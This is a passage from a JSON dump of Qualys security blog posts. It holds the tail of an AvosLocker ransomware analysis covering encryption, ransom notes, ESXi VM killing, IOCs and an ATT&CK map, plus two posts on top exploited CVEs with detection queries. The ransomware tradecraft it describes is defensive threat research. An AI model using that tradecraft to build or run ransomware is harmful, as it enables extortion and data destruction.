13).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-13-Hardcoded-Public-Key.png)Fig. 13: Hardcoded Public Key\n\nAfter file encryption using RSA, it uses the ChaCha20 algorithm to encrypt encryption-related information (fig. 14).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-14-Use-of-ChaCha20.png)Fig. 14: Use of ChaCha20\n\nIt appends this encryption-related information (fig. 15) at the end of the file with Base64 encoded format.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-15-Encryption-Related-Information.png)Fig.15: Encryption Related Information\n\nThen it appends the "avo2" extension to the file using MoveFileWithprogressW (fig. 16).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-16-Add-Extension-Using-Movie-File.png)Fig. 16: Add Extension Using Move File\n\nAs seen in figure 17, it has appended "avos2" extensions.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-17-File-with-Updated-Extension.png)Fig. 17: File with Updated Extension\n\nIt writes a ransom note (fig. 18) named \u201cGET_YOUR_FILES_BACK.txt\u201d to each encrypted directory before encryption of the file.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-18-Ransom-Note.png)Fig. 18: Ransom Note\n\nThe ransom note instructs the user to not to shut down the system in case encryption is in progress to avoid file corruption. It asks the victim to visit the onion address with the TOR browser to pay the ransom and to obtain the decryption key to decrypt the application or files.\n\n#### AvosLocker Payment System\n\nAfter submitting the "ID" mentioned on the ransom note to AvosLocker's website (fig. 19), the victim will be redirected to the "payment" page.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-19-AvosLockers-Website.png)Fig. 19: AvosLocker's Website\n\nIf the victim fails to pay the ransom, the attacker then puts the victim\u2019s data up for sale. Figure 20 shows the list of victims (redacted for obvious reasons) mentioned on the site.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-20-List-of-Victims.png)Fig. 20: List of Victims\n\nAvosLocker also offers an affiliate program that provides ransomware-as-a-service (RaaS). They provide \u201chelpful\u201d services to clients such as:\n\n * Supports Windows, Linux & ESXi.\n * Affiliate panel\n * Negotiation panel with push & sound notifications\n * Assistance in negotiations\n * Consultations on operations\n * Automatic builds\n * Automatic decryption tests\n * Encryption of network resources\n * Killing of processes and services with open handles to files\n * Highly configurable builds\n * Removal of shadow copies\n * Data storage\n * DDoS attacks\n * Calling services\n * Diverse network of penetration testers, access brokers and other contacts\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-21-Partnership-Program.png)Fig. 21: Partnership Program\n\n### Technical Analysis of AvosLocker Linux Variant\n\nIn this case, the AvosLocker malware arrives as an elf file. As shown in figure 22, the analyzed file is x64 based Linux executable file.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-22-FileDetails.png)Fig. 22: File Details\n\nIt\u2019s a command-line application having some command-line options (fig. 23).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-23-Command-Line-Options.png)Fig. 23: Command-Line Options\n\nThe `<Thread count>` parameter as shown above represents the number of threads that can be created to encrypt files simultaneously. It possesses the capability to kill ESXi VMs based on the parameter provided while executing.\n\nUpon execution, the malware first collects information about the number of threads that need to be created. Then it checks for string \u201cvmfs\u201d in the file path provided as a command-line argument (fig. 24).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-24-Checks-for-vmfs.png)Fig. 24: Checks for \u201cvmfs\u201d\n\nAfter that, it also checks for string \u201cESXi\u201d in the file path provided as a command-line argument (fig. 25).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-25-Checks-for-ESXi.png)Fig. 25: Checks for \u201cESXi\u201d\n\nIf this parameter is found, then it calls a routine to kill the running ESXi virtual machine (fig. 26).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-26-Code-to-Kill-ESXi-Virtual-Machine.png)Fig. 26: Code to Kill ESXi Virtual Machine\n\nThe command used for killing the ESXi virtual machine is as shown in figure 27.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-27-CommandToKillRunning_ESXi_Virtual_Machines.png)Fig. 27: Command to Kill Running ESXi Virtual Machine\n\nFurther, AvosLocker drops a ransom note file (fig. 28) at the targeted directory.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-28_Create_Ransom_Note.png)Fig. 28: Create ransom note\n\nAfter that, it starts creating a list of files that must be encrypted. Before adding a file path to the list, it checks whether it is a regular file or not (fig. 29). Only regular files are added to the encryption list.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-29-Check-File-Info.png)Fig. 29: Checks File Info\n\nAvosLocker skips the ransom note file and any files with the extension \u201cavoslinux\u201d from adding into the encryption list (fig. 30).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-30-Skip-avoslinux-extension-filet.png)Fig. 30: Skip \u201cavoslinux\u201d Extension File\n\nThen it calls the mutex lock/unlock API for thread synchronization as shown in figure 31.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-31-Lock-Unlock-Mutex-For-Thread-Synchronization.png)Fig. 31: Lock-Unlock Mutex for Thread Synchronization\n\nBased on the number of threads specified, it creates concurrent CPU threads (fig. 32). This helps in encrypting different files simultaneously at a very fast speed.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-32-Create-Threads-In-Loop.png)Fig. 32: Create Threads in Loop\n\nAvosLocker\u2019s Linux variant makes use of Advanced Encryption Standard (AES) and elliptic-curve cryptography (ECC) algorithms for data encryption.\n\nFile-related information along with the encryption key used might be encrypted and then encoded with base 64 formats. This encoded information is added at the end of each encrypted file (fig. 33).\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-33-File_Related_Info_Adde_At_End.png)Fig. 33: File-related Info added at the end\n\nFigure 34 shows the malware appending the extension \u201c.avoslinux\u201d to the encrypted file names.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-34-Files_Encrypted.png)Fig. 34: Append file extension \u201c.avoslinux\u201d after encryption\n\nBefore starting file encryption, it creates a ransom note named \u201cREADME_FOR_RESTORE \u201c. The content of this ransom note is shown in figure 35.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/03/Fig-35-RansomNote.png)Fig. 35: Ransom Note\n\nThe ransom note instructs the victim not to shut down the system in case encryption is in progress to avoid file corruption. It asks the victim to visit the onion address with a TOR browser to pay the ransom and to obtain the decryption key and decryption application.\n\n### Indicators of Compromise (IOCs):\n \n \n Windows: C0A42741EEF72991D9D0EE8B6C0531FC19151457A8B59BDCF7B6373D1FE56E02\n \n \n Linux: 7C935DCD672C4854495F41008120288E8E1C144089F1F06A23BD0A0F52A544B1\n \n \n URL:\n hxxp://avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad[.]onion.\n hxxp://avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad[.]onion\n\n### TTP Map:\n\nInitial Access| Execution| Defense Evasion| Discovery| Impact \n---|---|---|---|--- \nPhishing (T1566)| User Execution \n(T1204)| Obfuscated Files or Information (T1027)| System Information Discovery (T1082)| Data Encrypted for Impact \n(T1486) \n| | | File and Directory Discovery (T1083)| Inhibit System Recovery \n(T1490)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-07T05:18:46", "type": "qualysblog", "title": "AvosLocker Ransomware Behavior Examined on Windows & Linux", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31206", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-07T05:18:46", "id": "QUALYSBLOG:DC0F3E59C4DA6EB885E6BCAB292BCA7D", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-24T19:24:47", "description": "A unified front against malicious cyber actors is climactic in the ever-evolving cybersecurity landscape. The joint Cybersecurity Advisory (CSA), a collaboration between leading cybersecurity agencies from the United States, Canada, United Kingdom, Australia, and New Zealand, is a critical guide to strengthen global cyber resilience. The agencies involved include the U.S.'s CISA, NSA, and FBI; Canada's CCCS; U.K.'s NCSC-UK; Australia's ACSC; and New Zealand's NCSC-NZ and CERT NZ. \n\nThis collaboration among key cybersecurity agencies highlights the global nature of cybersecurity threats. Such cooperative efforts signify a unified perspective and highlight the need for shared intelligence and coordinated strategies. The realization that cybersecurity is not limited to national borders but is a shared responsibility is growing more evident. \n\nThe CSA sheds light on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited in 2022 and the associated Common Weakness Enumeration(s) (CWE). It outlines crucial technical details and key findings, providing actionable guidance and mitigation strategies. Vendors, designers, developers, and end-user organizations are strongly urged to implement these guidelines to strengthen their defenses against possible threats. \n\n### **The Cybersecurity Advisory (CSA) has identified the following key findings that outline essential insights into the behaviors and tendencies of malicious cyber actors for 2022:** \n\n * **Older Vulnerabilities Targeted**: Malicious cyber actors exploited older software vulnerabilities more frequently, targeting unpatched, internet-facing systems. \n * **Proof of Concept (PoC) Code**: Public availability of PoC code likely facilitated broader exploitation by malicious actors. \n * **Success in First Two Years**: Known vulnerabilities are most successfully exploited within the first two years of disclosure. Timely patching reduces this effectiveness. \n * **Prioritization of Severe CVEs**: Cyber actors prioritize severe and globally prevalent vulnerabilities, seeking low-cost, high-impact tools and paying attention to vulnerabilities principal in specific targets' networks. \n * **Detection through Deep Packet Inspection**: Deep packet inspection can often detect exploits involving multiple CVE or CVE chains. \n\nIn 2022, malicious cyber actors routinely exploited 12 severe vulnerabilities, affecting various products and services. These issues included the long-exploited Fortinet SSL VPNs' CVE-2018-13379 and widespread vulnerabilities such as Apache's Log4Shell (CVE-2021-44228). They impacted multiple systems, from Microsoft Exchange email servers to Atlassian Confluence and software like Zoho ManageEngine and VMware. The exploitation often resulted from organizations' failure to patch software or due to publicly available proofs of concept (PoC), enabling remote execution, privilege escalation, and authentication bypass. The table below shows detailed information on these 12 vulnerabilities, along with Qualys-provided QIDs. A crucial commonality between these vulnerabilities is their potential to compromise system integrity, confidentiality, and availability severely. The Qualys Threat Research Unit (TRU) team has addressed all aforementioned critical vulnerabilities by providing QIDs within 24 hours. These critical vulnerabilities are categorized based on their potential impact if exploited as follows: \n\nCVE/Vuln Name| Vendor/Product| Type| QID| QDS \n---|---|---|---|--- \nCVE-2018-13379| Fortinet - FortiOS and FortiProxy | SSL VPN Credential Exposure | 43702| 100 \nCVE-2021-34473 (Proxy Shell) | Microsoft - Exchange Server | RCE | 50114, 50107| 100 \nCVE-2021-31207 (Proxy Shell) | Microsoft - Exchange Server | Security Feature Bypass | 50114, 50111| 95 \nCVE-2021-34523 (Proxy Shell) | Microsoft - Exchange Server | Elevation of Privilege | 50114, 50112| 100 \nCVE-2021-40539| Zoho ManageEngine - ADSelfService Plus | RCE/Authentication Bypass | 375840| 100 \nCVE-2021-26084| Atlassian - Confluence Server and Data Center | Arbitrary code execution | 375839, 730172| 100 \nCVE-2021-44228 (Log4Shell) | Apache - Log4j2 | RCE | 730447, 376521| 100 \nCVE-2022-22954| VMware - Workspace ONE Access and Identity Manager | RCE | 730447, 376521| 100 \nCVE-2022-22960| VMware - Workspace ONE Access, Identity Manager, and vRealize Automation | Improper Privilege Management | 376521| 95 \nCVE-2022-1388| F5 Networks - BIG-IP | Missing Authentication Vulnerability | 730489, 376577| 96 \nCVE-2022-30190 (Follina)| Microsoft - Multiple Products | RCE | 91909| 100 \nCVE-2022-26134| Atlassian - Confluence Server and Data Center | RCE | 376657, 730514| 100 \n \n**Vulnerabilities Paving the Way for Data Theft and More:** \n\nThe following vulnerabilities that could potentially lead to data theft or lay the groundwork for further attacks: \n\n * **CVE-2018-13379**, a flaw in the Fortinet FortiOS SSL VPN web portal, could be leveraged by attackers to gain unauthorized access to sensitive SSL VPN session data. \n * **CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207**, collectively known as ProxyShell vulnerabilities affecting Microsoft Exchange Servers, could enable bad actors to deploy web shells and execute arbitrary code on compromised devices. \n * **CVE-2022-1388**, an F5 BIG-IP iControl REST API vulnerability, could offer initial network access to cyber criminals, enabling infamous activities like data theft or ransomware deployment. \n\n**Vulnerabilities Leading to System Takeover:** \n\nNext, the following vulnerabilities that could potentially compromise an entire system: \n\n * **CVE-2021-44228**, or Log4Shell, exploits Apache's log4j Java library, possibly leading to a total system compromise. \n * **CVE-2021-26084 and CVE-2022-26134**, vulnerabilities found in Atlassian's Confluence Server and Data Center, can allow an attacker to execute arbitrary code, leading to a potential system takeover. \n * **CVE-2021-40539**, an issue with Zoho ManageEngine ADSelfService Plus, can allow for arbitrary code execution and potential system compromise. \n * **CVE-2022-30190**, found in the Microsoft Support Diagnostic Tool, can be exploited for remote code execution, potentially leading to full system compromise. \n * **CVE-2022-22954 and CVE-2022-22960**, affecting VMware Workspace ONE Access, Identity Manager, and vRealize Automation, can allow for remote code execution and privilege escalation, respectively, potentially leading to full system compromise. \n\n### **Analyzing Vulnerability Remediation Patterns and the Urgency of Swift Patching**\n\nOur data, which sheds light on the patching behavior for 12 significant vulnerabilities, is pulled from the Qualys TruRisk Platform. This data is anonymized to ensure that any data analysis cannot revert to identifying specific organization or asset information. \n\nThe data highlights a prominent challenge where some vulnerabilities witness rapid mitigation, highlighting proactive security measures. In contrast, others face prolonged remediation times, raising concerns about potential exposure risks. Such disparities underline the importance of detecting and swiftly addressing vulnerabilities. As cyber threats grow in sophistication, the urgency to patch quickly and efficiently becomes paramount. The following plot contrasting the patch rates and remediation times for 12 frequently exploited vulnerabilities in 2022 further illustrates this point. It shows that while some vulnerabilities are quickly patched, others remain unaddressed for extended periods. This analysis reinforces the importance of timely vulnerability management and the pressing need to do so with speed and diligence, especially for high-risk vulnerabilities. \n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/08/NSA_final-1070x644.png)\n\nFig 1. Patch Rate vs. Average Remediation Days for Top 12 Routinely Exploited Vulnerabilities in 2022 \n\nThe damaging potential of these vulnerabilities highlights the vital importance of cybersecurity alertness. By understanding the risks and possible impacts of these threats, organizations can adopt proactive defense strategies, patching vulnerabilities and updating systems regularly to ensure the integrity of their environments. The advisory also emphasizes the criticality of accurately incorporating the CWE field in published CVEs to highlight vulnerability root causes and support industry-wide software security insights. \n\n### **Aligning Qualys Platform with Joint Cybersecurity Advisory Mitigating Guidelines** \n\nThe recent joint Cybersecurity Advisory (CSA) emphasizes the urgency of identifying exploited vulnerabilities, keeping all network assets updated, and implementing a robust patch management process. Among the recommendations are the timely updating of software, prioritizing patches for known vulnerabilities, performing automated asset discovery, and implementing centralized patch management. \n\nQualys' suite of products directly aligns with these critical recommendations. Qualys Cybersecurity Asset Management (CSAM) ensures 360-degree visibility of assets, aligning with CSA's call for comprehensive asset discovery. Qualys Patch Management offers an advanced automated solution for timely updates, while Qualys VMDR facilitates the discovery, assessment, and prioritization of vulnerabilities. By leveraging Qualys' unified platform, organizations can efficiently adhere to international best practices outlined in the CSA, enhancing their defense against cyber threats. \n\nIn addition, the joint Cybersecurity Advisory (CSA) stresses the need for robust protective controls and architecture. Key recommendations include securing internet-facing network devices, continuously monitoring the attack surface, and prioritizing secure-by-default configurations. There is a strong focus on hardening network protocols, managing access controls, and employing security tools such as EDR and SIEM for enhanced protection. \n\nQualys Threat Protection aligns seamlessly with these recommendations by providing centralized control and comprehensive visibility of the threat landscape. By continuously correlating external threat information against vulnerabilities and the IT asset inventory, Qualys allows organizations to pinpoint and prioritize the most critical security threats. Whether managing vulnerabilities, controlling the threat prioritization process, or ensuring compliance with regulations, Qualys empowers organizations to align with the CSA's guidelines and achieve a fortified security posture. \n\nQualys TotalCloud also employs deep learning AI to continuously monitor the attack surface and investigate abnormal activity, aligning with CSA guidelines. It is leveraging an interconnected artificial neural network that detects known and unknown malware with over 99% accuracy in less than a second. Through these capabilities, Qualys TotalCloud delivers an advanced, rapid, and precise solution for malware detection in multi-cloud environments and bypassing the limitations of signature-based systems. \n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/08/NSA_2-1070x370.jpg)\n\nFig 2. Qualys VMDR TruRisk Dashboard for top 12 routinely exploited vulnerabilities in 2022 \n\nThe [Qualys VMDR TruRisk Dashboard](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/08/Qualys-VMDR-TruRisk-UDdashboard.json_.zip>) (JSON zipped) helps organizations to have complete visibility into open vulnerabilities that focus on the organization\u2019s global risk score, high-risk vulnerabilities, and Top Exploited Vulnerabilities. Once you identify the vulnerable assets for these top vulnerable CVEs prioritized among your remediation owners, you can instantly use Qualys Patch management to reduce the risk. \n\nIn conclusion, this Cybersecurity Advisory (CSA) offers valuable insights and mitigation strategies against routine vulnerabilities. Qualys provides robust solutions that align seamlessly with CSA's recommendations, including asset management, timely updates, vulnerability prioritization, and advanced threat detection capabilities in this growing landscape. Consequently, organizations can strengthen their defenses against cyber threats by sticking to CSA guidelines and leveraging comprehensive cybersecurity solutions like Qualys'. \n\n## References\n\n[CISA, NSA, FBI and International Partners Issue Advisory on the Top Routinely Exploited Vulnerabilities in 2022](<https://media.defense.gov/2023/Aug/03/2003273618/-1/-1/0/JOINT-CSA-2022-TOP-ROUTINELY-EXPLOITED-VULNERABILITIES.PDF>)\n\n## Additional Contributor \n\n * Ramesh Ramachandran, Principal Product Manager, Qualys\n * Aubrey Perin, Lead Threat Intelligence Analyst, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-08-24T19:07:05", "type": "qualysblog", "title": "Qualys Tackles 2022\u2019s Top Routinely Exploited Cyber Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26084", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22960", "CVE-2022-26134", "CVE-2022-30190"], "modified": "2023-08-24T19:07:05", "id": "QUALYSBLOG:56A00F45A170AF95CF38191399649A4C", "href": "https://blog.qualys.com/category/qualys-insights", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-11T05:29:14", "description": "_The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report\u2019s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment._\n\nThe Cybersecurity & Infrastructure Security Agency (CISA) releases [detailed alerts](<https://www.cisa.gov/uscert/ncas/alerts>) of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights into the type, nature, and vendor product affected, as well as recommended mitigations that enterprise IT/security professionals can take to reduce their risk.\n\nTo that end, CISA has released its [2021 Top Routinely Exploited Vulnerabilities Report](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>). It provides in-depth details of each exploited CVE, including which threat actors aggressively targeted both public and private sector organizations worldwide. It also provides mitigation guidance for all the top vulnerabilities.\n\nOf special interest in the report is this key finding by CISA:\n\n_Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors._\n\n### CISA\u2019s Top 15 Routinely Exploited Vulnerabilities of 2021\n\nThe top 15 routine vulnerability exploits observed by cybersecurity authorities in the U.S., Australia, Canada, New Zealand, and the U.K. are:\n\nCVE| Vulnerability Name| Vendor and Product| Type \n---|---|---|--- \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)| [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>) | Apache Log4j| Remote code execution (RCE) \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)| | Zoho ManageEngine AD SelfService Plus| RCE \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)| ProxyShell| Microsoft Exchange Server| Elevation of privilege \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)| ProxyShell| Microsoft Exchange Server| RCE \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)| ProxyShell| Microsoft Exchange Server| Security feature bypass \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)| | Atlassian Confluence Server and Data Center| Arbitrary code execution \n[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)| | VMware vSphere Client| RCE \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)| [ZeroLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2020/09/15/microsoft-netlogon-vulnerability-cve-2020-1472-zerologon-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Netlogon Remote Protocol (MS-NRPC)| Elevation of privilege \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)| | Microsoft Exchange Server| RCE \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)| | Pulse Secure Pulse Connect Secure| Arbitrary file reading \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)| | Fortinet FortiOS and FortiProxy| Path traversal \n \n### Highlights of Top Vulnerabilities Cited in CISA 2021 Report\n\nBased on the analysis of this report by the Qualys Research Team, let\u2019s review a few of the top vulnerabilities on the 2021 list and our recommendations for how Qualys enterprise customers can detect and respond to them.\n\n#### Log4Shell Vulnerability\n\nThe Log4Shell vulnerability **(CVE-2021-44228)** was disclosed in December 2021. It was widely exploited by sending a specially crafted code string, which allowed an attacker to execute arbitrary Java code on the server and take complete control of the system. Thousands of products used Log4Shell and were vulnerable to the Log4Shell exploitation.\n\nVisit the [Qualys Log4Shell website](<https://www.qualys.com/log4shell-cve-2021-44228/>) for full details on our response to this threat.\n\n### ProxyShell: Multiple Vulnerabilities\n\nThe multiple vulnerabilities called ProxyShell **(CVE-2021-34523, CVE-2021-34473, CVE-2021-31207)** affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., via "vulnerability chaining") enables a remote actor to execute arbitrary code and privilege escalation.\n\n### ProxyLogon: Multiple Vulnerabilities\n\nThe multiple vulnerabilities named ProxyLogon **(CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065)** also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination allows an unauthenticated threat actor to execute arbitrary code on vulnerable Exchange Servers, which enables the attacker to gain persistent access to files, mailboxes, and credentials stored on the servers.\n\n[Read our blog](<https://blog.qualys.com/product-tech/2021/03/10/security-advisory-mitigating-the-risk-of-microsoft-exchange-zero-day-proxylogon-vulnerabilities>) on this threat.\n\n#### Confluence Server and Data Center Vulnerability\n\nAn Object Graph Navigation Library injection vulnerability **(CVE-2021-26084)** exists in Confluence Server that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\n#### Top Vulnerabilities of 2020 Persist\n\nThree additional vulnerabilities **(CVE-2020-1472, CVE-2018-13379, CVE-2019-11510)** were part of the routinely exploited [top vulnerabilities of 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) list but continued to be exploited well into 2021.\n\n### How Can Qualys Help?\n\nThe Qualys Research Team stays on top of CISA\u2019s vulnerability reports by mapping and releasing our QIDs as needed. The goal is to provide our enterprise customers with complete visibility into risk across their organizations.\n\n#### Detect CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\n[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) provides coverage for all 15 vulnerabilities described in the CISA report. [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) can automatically patch all Windows-related vulnerabilities which account for 60% of the 15 vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities.\n\nUsing VMDR and Qualys Query Language (QQL) lets you easily detect all your assets that are vulnerable to the top 15.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Vulnerabilities_tab-1.png)View vulnerabilities be severity in Qualys VMDR\n\nQualys Unified Dashboard provides a comprehensive view of the top 15 exploited vulnerabilities as they affect your entire enterprise environment. The dashboard allows the security team to keep track of each vulnerability as they may propagate across multiple assets in your infrastructure.\n\nDashboard CISA: Alert (AA22-117A) | Top 15 Routinely Exploited\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Dashboard-1.png)Qualys Unified Dashboard\n\n#### Prioritize CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys VMDR makes it easy to prioritize the top 15 exploited vulnerabilities affecting your company\u2019s internet-facing assets. To do so, apply the tag \u201cInternet Facing Assets\u201d in the Prioritization tab. You can add tags like "Cloud Environments", "Type: Servers", "Web Servers", and "VMDR-Web Servers" to increase your scope of assets.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Prioritized_Tab.png)Prioritizing vulnerabilities for remediation in Qualys VMDR\n\n#### Remediate CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys Patch Management offers out-of-the-box support for patching multiple CISA vulnerabilities. Patch Management also provides patches for many Microsoft, Linux, and third-party application vulnerabilities.\n\nTo view the patchable QIDs, enable the "Show only Patchable" toggle button. After that, you can configure the patch job to patch the relevant QIDs and their respective associated CVEs.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Prioritized_Patch-with-Patch-Job.png)Using Qualys Patch Management to apply patches\n\nQualys Patch Management also provides the ability to deploy custom patches. The flexibility to customize patch deployment allows you to patch all the remaining CVEs in your patching to-do list.\n\nTo get a view of all available patches for CISA\u2019s top 15 exploitable vulnerabilities of 2021, go to the Patch Management application and run this QQL statement in 